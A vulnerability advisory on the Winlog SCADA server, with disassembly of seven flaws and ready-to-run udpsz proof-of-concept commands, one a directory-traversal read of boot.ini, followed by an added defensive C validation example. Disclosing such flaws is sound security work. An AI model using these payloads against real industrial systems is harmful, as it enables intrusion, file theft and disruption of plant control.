#######################################################################

                             Luigi Auriemma

Application:  Sielco Sistemi Winlog
              http://www.sielcosistemi.com/en/products/winlog_scada_hmi/
Versions:     <= 2.07.16
Platforms:    Windows
Bugs:         A] DbiGetRecordCount code execution
              B] @Db@TDataSet@Close$qqrv code execution
              C] DbiSetToRecordNo code execution
              D] _TCPIPS_BinOpenFileFP stack overflow
              E] Directory traversal
              F] write4
              G] write1
Exploitation: remote
Date:         26 Jun 2012
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bugs
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

From vendor's website:
"Simple, flexible and economical, Winlog Pro is a SCADA/HMI software
package for the supervision of industrial and civil plants."

#######################################################################

=======
2) Bugs
=======

This software can act as a TCP/IP server by enabling the "Run TCP/IP
server" option available in the "Configuration->Options->TCP/IP" section
of the project we want to run; Runtime.exe will then listen on TCP port
46824.

The part of the server running on this port uses a static buffer of
0x119 bytes to handle the incoming data, so all the vulnerabilities
explained below can be exploited using these fixed addresses. The
exception handler used by the server also allows many attempts to be
made without altering the normal work of the program.
-----------------------------------
A] DbiGetRecordCount code execution
-----------------------------------

DbfIntf.DbiGetRecordCount:
  0038354B  8B10             MOV EDX,DWORD PTR DS:[EAX]
  0038354D  FF92 F4000000    CALL DWORD PTR DS:[EDX+F4]

-----------------------------------------
B] @Db@TDataSet@Close$qqrv code execution
-----------------------------------------

Vcldb40.@Db@TDataSet@Close$qqrv:
  46012BEE  8B08             MOV ECX,DWORD PTR DS:[EAX]
  46012BF0  FF91 20010000    CALL DWORD PTR DS:[ECX+120]

----------------------------------
C] DbiSetToRecordNo code execution
----------------------------------

DbfIntf.DbiSetToRecordNo:
  00382BEB  8B10             MOV EDX,DWORD PTR DS:[EAX]
  00382BED  FF92 F4000000    CALL DWORD PTR DS:[EDX+F4]

---------------------------------------
D] _TCPIPS_BinOpenFileFP stack overflow
---------------------------------------

  004134F6  /. 55              PUSH EBP
  004134F7  |. 8BEC            MOV EBP,ESP
  004134F9  |. 81C4 FCFEFFFF   ADD ESP,-104
  ...
  00413525  |> FF75 08         PUSH DWORD PTR SS:[EBP+8]       ; /Arg4
  00413528  |. 8B15 E8085B00   MOV EDX,DWORD PTR DS:[5B08E8]   ; |
  0041352E  |. 8D8D FCFEFFFF   LEA ECX,DWORD PTR SS:[EBP-104]  ; |
  00413534  |. 81C2 E0020000   ADD EDX,2E0                     ; |
  0041353A  |. 52              PUSH EDX                        ; |Arg3
  0041353B  |. 68 FC245600     PUSH Runtime.005624FC           ; |Arg2 = 005624FC ASCII "%s\%s"
  00413540  |. 51              PUSH ECX                        ; |Arg1
  00413541  |. E8 B6BD1300     CALL Runtime.0054F2FC           ; \RunTime.0054F2FC sprintf()

----------------------
E] Directory traversal
----------------------

Through opcode 0x78 it is possible to open any file on the disk of the
machine where the server is running, and with 0x96/0x97/0x98 it is
possible to read its content.
---------
F] write4
---------

The opcodes used for the file operations specify a 32-bit number that
is the element of the array returned by the server when the file was
opened, so it can be used to load a file pointer from outside the array
(stream lock table, PUSH DWORD PTR DS:[EBX*4+5B0024]) and maybe reach
EnterCriticalSection with an arbitrary value:

EnterCriticalSection:
  7C81A1C1  F0:0FB301        LOCK BTR DWORD PTR DS:[ECX],EAX   ; LOCK prefix

Anyway, exploiting a bug like this is very theoretical because it's
hard to bypass all the obstacles to using one's own 32-bit value with
EnterCriticalSection.

---------
G] write1
---------

The lack of checks on the return value of the realloc function used by
the software allows a 0x00 byte to be written outside the existing
buffer if the size specified for the reallocation is negative or cannot
be allocated:

Vcl40.@System@@LStrSetLength$qqrv:
  40004F42  E8 E1DCFFFF      CALL Vcl40.@System@@ReallocMem$qqrv
  40004F47  58               POP EAX
  40004F48  83C0 08          ADD EAX,8
  40004F4B  8903             MOV DWORD PTR DS:[EBX],EAX
  40004F4D  8970 FC          MOV DWORD PTR DS:[EAX-4],ESI
  40004F50  C60430 00        MOV BYTE PTR DS:[EAX+ESI],0

#######################################################################

===========
3) The Code
===========

http://aluigi.org/testz/udpsz.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15992.zip

A] udpsz -b a -T -C 15 0x14 -C "e6563600 e6563600" 0x15 SERVER 46824 0x119
B] udpsz -b a -T -C 17 0x14 -C "e6563600 ea563600 ce553600" 0x15 SERVER 46824 0x119
C] udpsz -b a -T -C 1e 0x14 -C "11111111 e6563600" 0x15 SERVER 46824 0x119 -C 28 -C 32 -C 3c
D] udpsz -b a -T -C 78 0x14 SERVER 46824 0x119
E] udpsz -D -4 -T -C 78 0x14 -c "../../../../../../../../../../boot.ini\0" 0x15 SERVER 46824 0x119
   udpsz -D -4 -T -C 98 0x14 -C "00 00 00 00" 0x19 SERVER 46824 0x119
F] udpsz -b 0x40 -T SERVER 46824 0xfffff
   udpsz -T -C 7b 0x14 -b 0x7f -C "c1c13800" 0x15 SERVER 46824 0x119
   note that the above PoC does NOTHING, it's just a note
G] udpsz -T -C 15 0x14 -C "e6563600 7a553600 f2563600 88888888" 0x15 SERVER 46824 0x119

#######################################################################

======
4) Fix
======

No fix.

#######################################################################
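The advisory lists no vendor fix. As an added illustration from the defender's side (this is example code written for this page, not code from the advisory, from Sielco Sistemi or from Winlog), the C below shows the input checks whose absence bugs D, E, F and G describe: a bounded "%s\%s" path join instead of sprintf() into a 0x104-byte stack buffer, rejection of file names that escape the base directory, a bounds check on the 32-bit stream index before the table lookup, and a realloc whose result and requested size are checked before the terminating zero byte is written. The packet layout (one opcode byte at offset 0x14, a NUL-terminated argument from offset 0x15, inside the 0x119-byte receive buffer) is inferred from the udpsz commands in section 3 and is an assumption, as are the base directory, the table size MAX_STREAMS and the packet contents, which are constructed for the demonstration.

```c
/* Added defensive example (not from the advisory or the vendor).
 * Packet layout assumed from the udpsz PoCs: opcode at 0x14, argument at 0x15. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define RECV_BUF_SIZE  0x119   /* static receive buffer size quoted in the advisory */
#define OPCODE_OFFSET  0x14    /* assumption: opcode byte position */
#define ARG_OFFSET     0x15    /* assumption: start of the NUL-terminated argument */
#define PATH_BUF_SIZE  0x104   /* stack buffer size in _TCPIPS_BinOpenFileFP (ADD ESP,-104) */
#define OPC_OPEN_FILE  0x78    /* opcode the advisory ties to opening files */
#define MAX_STREAMS    16      /* constructed size of the stream lock table */

enum { REQ_OK = 0, REQ_BAD_LENGTH = -1, REQ_BAD_NAME = -2, REQ_TOO_LONG = -3 };

/* Copy the argument out as a bounded C string; an argument with no NUL inside the
 * receive buffer is rejected instead of letting "%s" read past it. */
static int extract_arg(const uint8_t *pkt, size_t len, char *out, size_t outsz)
{
    if (len <= ARG_OFFSET || len > RECV_BUF_SIZE) return REQ_BAD_LENGTH;
    const uint8_t *arg = pkt + ARG_OFFSET;
    size_t room = len - ARG_OFFSET;
    const uint8_t *nul = memchr(arg, 0, room);
    if (nul == NULL) return REQ_BAD_LENGTH;
    size_t n = (size_t)(nul - arg);
    if (n + 1 > outsz) return REQ_TOO_LONG;
    memcpy(out, arg, n);
    out[n] = '\0';
    return REQ_OK;
}

/* Bug E: accept only a bare file name, never a path separator, drive letter or ".." */
int filename_is_safe(const char *name)
{
    if (name[0] == '\0') return 0;
    if (strpbrk(name, "/\\:") != NULL) return 0;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0) return 0;
    return 1;
}

/* Bug D: snprintf with the real buffer size; truncation is treated as an error, not silently used */
int build_path(char *out, size_t outsz, const char *dir, const char *name)
{
    int n = snprintf(out, outsz, "%s\\%s", dir, name);
    if (n < 0 || (size_t)n >= outsz) { out[0] = '\0'; return REQ_TOO_LONG; }
    return REQ_OK;
}

/* Bug F: the client-supplied 32-bit handle must index inside the table, not anywhere in memory */
FILE *lookup_stream(FILE *const *table, size_t count, uint32_t idx)
{
    if (idx >= count) return NULL;
    return table[idx];
}

/* Bug G: reject negative sizes and check the realloc result before writing the final 0x00 byte;
 * on failure the old buffer is left untouched and nothing is written */
int set_string_length(char **buf, size_t *len, long newlen)
{
    if (newlen < 0) return REQ_BAD_LENGTH;
    char *p = realloc(*buf, (size_t)newlen + 1);
    if (p == NULL) return REQ_BAD_LENGTH;
    p[newlen] = '\0';
    *buf = p;
    *len = (size_t)newlen;
    return REQ_OK;
}

/* Validate an open-file request and compute the path it would open; no file is touched here */
int handle_open_request(const uint8_t *pkt, size_t len, const char *base_dir, char *path, size_t pathsz)
{
    char name[RECV_BUF_SIZE];
    int rc;
    if (len <= OPCODE_OFFSET || pkt[OPCODE_OFFSET] != OPC_OPEN_FILE) return REQ_BAD_LENGTH;
    if ((rc = extract_arg(pkt, len, name, sizeof name)) != REQ_OK) return rc;
    if (!filename_is_safe(name)) return REQ_BAD_NAME;
    return build_path(path, pathsz, base_dir, name);
}

/* Build a constructed open-file packet carrying `name` and run it through the handler */
int open_request_result(const char *name)
{
    uint8_t pkt[RECV_BUF_SIZE] = {0};
    char path[PATH_BUF_SIZE];
    size_t n = strlen(name);
    if (n >= RECV_BUF_SIZE - ARG_OFFSET) return REQ_TOO_LONG; /* does not even fit the receive buffer */
    pkt[OPCODE_OFFSET] = OPC_OPEN_FILE;
    memcpy(pkt + ARG_OFFSET, name, n + 1);
    return handle_open_request(pkt, sizeof pkt, "C:\\Winlog\\Data", path, sizeof path);
}

int main(void)
{
    printf("report.txt      -> %d\n", open_request_result("report.txt"));      /* 0, accepted */
    printf("../../boot.ini  -> %d\n", open_request_result("../../boot.ini"));  /* -2, rejected */
    return 0;
}
```

The handler rejects rather than sanitises: a request whose argument is unterminated, escapes the directory, or produces a path longer than the buffer is dropped with an error code, which is the behaviour a server exposed on TCP 46824 should have had instead of trusting the 0x119-byte buffer's contents. The same pattern (validate length, validate content, bounds-check every client-supplied index, check every allocation result) applies to the record-number and handle arguments of the other opcodes.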